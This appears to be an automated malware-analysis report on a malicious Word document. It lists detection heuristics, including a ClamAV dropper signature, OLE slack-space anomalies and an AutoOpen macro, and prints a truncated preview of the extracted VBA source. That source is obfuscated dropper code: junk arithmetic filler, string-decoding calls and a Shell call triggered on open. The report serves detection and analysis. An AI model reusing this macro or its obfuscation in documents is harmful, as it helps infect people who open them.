MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious OLE document containing a legacy WordBasic Autoopen macro, as indicated by multiple heuristics and the ClamAV detection name. The macro is likely intended to download and execute a second-stage payload, although the specific actions are obfuscated. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malicious documents.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6542819-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6542819-0
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 129,536 bytes but its declared streams total only 35,284 bytes — 94,252 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31982 bytes |
SHA-256: d0297d721623135f969815430ad0f4bbb2754afc4d7486039ef6d644e923a37b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ujDjvvQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jpiWVs(tssPw)
twzSX = 89948 * CByte(bcDtOn)
wvGHf = Int(92496) - Oct(30921 - 82308 * TYNLPB)
YCFNn = 98570 * CByte(NSkFX)
End Sub
Sub moIif(zlkkA)
CSduJj = 40580 * CByte(airIZY)
Wtpurs = Int(69110) - Oct(85177 - 59458 * ffuDQ)
RFXlhv = 35999 * CByte(AjzjH)
zIHYas = 90646 * CByte(JzSZwi)
EaWKqZ = Int(7137) - Oct(4275 - 75677 * bajuH)
DkhQWX = 42676 * CByte(YtcvaS)
woivJ = 50997 * CByte(RYvGU)
zROvC = Int(4280) - Oct(29548 - 79080 * OIhEt)
wzHcVI = 58631 * CByte(CwzUjT)
End Sub
Sub UQDNd(ijtXC)
faWOE = 63179 * CByte(Uboizz)
iMzEh = Int(66465) - Oct(42244 - 15837 * rdqQfR)
NESqw = 24166 * CByte(jtnwwi)
mEOIcS = 68588 * CByte(qUwXji)
NQFDKa = Int(49868) - Oct(63584 - 18316 * RfNKt)
XaMFZc = 14049 * CByte(zjXNz)
End Sub
Sub Autoopen()
On Error Resume Next
bfBwfX = 82635 * CByte(XGMXEm)
mVfwi = Int(47288) - Oct(94569 - 38523 * LlJCD)
CMjPum = 57434 * CByte(iWvcC)
TiOoQjQV (tCXUs + nFODYizhYv + KsQPV)
LdmuNo = 83371 * CByte(DznpsX)
GAamw = Int(89143) - Oct(25867 - 59843 * NoJrT)
vTuQa = 1176 * CByte(kIGlJC)
End Sub
Sub OicUDE(qcZjww)
hYfzau = 8937 * CByte(vbzIi)
SjLlK = Int(72224) - Oct(89795 - 58644 * ooORF)
UjcCzD = 69137 * CByte(liIoun)
XuacY = 93628 * CByte(wnMiC)
rKLdz = Int(56051) - Oct(50226 - 91202 * GiMiF)
CCwAq = 22727 * CByte(uoohu)
hopQA = 45545 * CByte(aWfpRN)
CovPq = Int(83574) - Oct(77562 - 92899 * PiMAaQ)
oSiTN = 62233 * CByte(OMKVz)
End Sub
Sub WHidGO(tYrCS)
DZhoXI = 18955 * CByte(qXiur)
YjDfV = Int(79269) - Oct(32261 - 27959 * zitML)
QbjAcc = 81113 * CByte(YnMpfj)
End Sub
Attribute VB_Name = "DnaCdFskcp"
Sub bMwaSDZjUqjhz()
On Error Resume Next
XTqLW = 25401 * CByte(fMbjjc)
bBjdzP = Int(97753) - Oct(43711 - 59168 * QTCzi)
UGdBFm = 3700 * CByte(FcKwA)
End Sub
Sub TiOoQjQV(qFkOSjfj As String)
On Error Resume Next
tlbwI = 36751 * CByte(FhhBB)
ovCKiB = Int(60277) - Oct(12393 - 51178 * aXpzJ)
WFCWJ = 16937 * CByte(sFrLZP)
vAEwN = 58418 * CByte(RjvUO)
iBZTT = Int(94623) - Oct(65040 - 21448 * wiffRK)
nqFrC = 14481 * CByte(TslfU)
[Shell] ZHBuq + Chr(vbKeyC) + qFkOSjfj + qjXrchNTBZRhNs + sEPXQbb, ciXcjw + 0 + ciXcjw
biRMG = 5531 * CByte(dlpVTY)
zcKoo = Int(45915) - Oct(87361 - 52283 * ScrjC)
WZTPaw = 17451 * CByte(UGQKw)
End Sub
Function zASGqGjRfHpou()
On Error Resume Next
ZSZmi = 40074 * CByte(QwvZm)
mBvzKi = Int(73865) - Oct(9146 - 26514 * lCZSY)
cRCNhX = 37346 * CByte(qYznLm)
wzojrjlq = OUtvU("U.E%!=%WnBWkLSCrkzUic%Ewj", 63981 - 63981 + 4 + 63981 - 63981, 63981 - 63981 + 19 + 63981 - 63981)
nblVbS = 62382 * CByte(TDOLDo)
JCndVd = Int(44405) - Oct(48298 - 16732 * iMGli)
tbjzan = 95003 * CByte(TwniJS)
lKNmz = 5464 * CByte(qKtaXM)
dspoU = Int(42104) - Oct(10273 - 71852 * oiXzZ)
zmEJvK = 67825 * CByte(WZnSlc)
imUVPz = OUtvU("S5% tc@IAX0", 23556 - 23556 + 7 + 23556 - 23556, 23556 - 23556 + 3 + 23556 - 23556)
cCcUsH = 30264 * CByte(DQDAl)
IaFUt = Int(22104) - Oct(13415 - 42544 * RutNT)
jDUJf = 23413 * CByte(vchqjQ)
LGvuZE = 12242 * CByte(jrlRTD)
Xvsvm = Int(7663) - Oct(96100 - 40404 * wOfIu)
FbATj = 76119 * CByte(ZjFjzO)
dTpwzIOh = OUtvU("zu6jLoz", 1553 - 1553 + 2 + 1553 - 1553, 1553 - 1553 + 1 + 1553 - 1553)
kUVzbU = 92240 * CByte(KVuNlf)
LZzuOl = Int(19483) - Oct(31765 - 99342 * YlVLq)
Ejbfd = 85650 * CByte(haWYRf)
wqvuwq = 74139
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.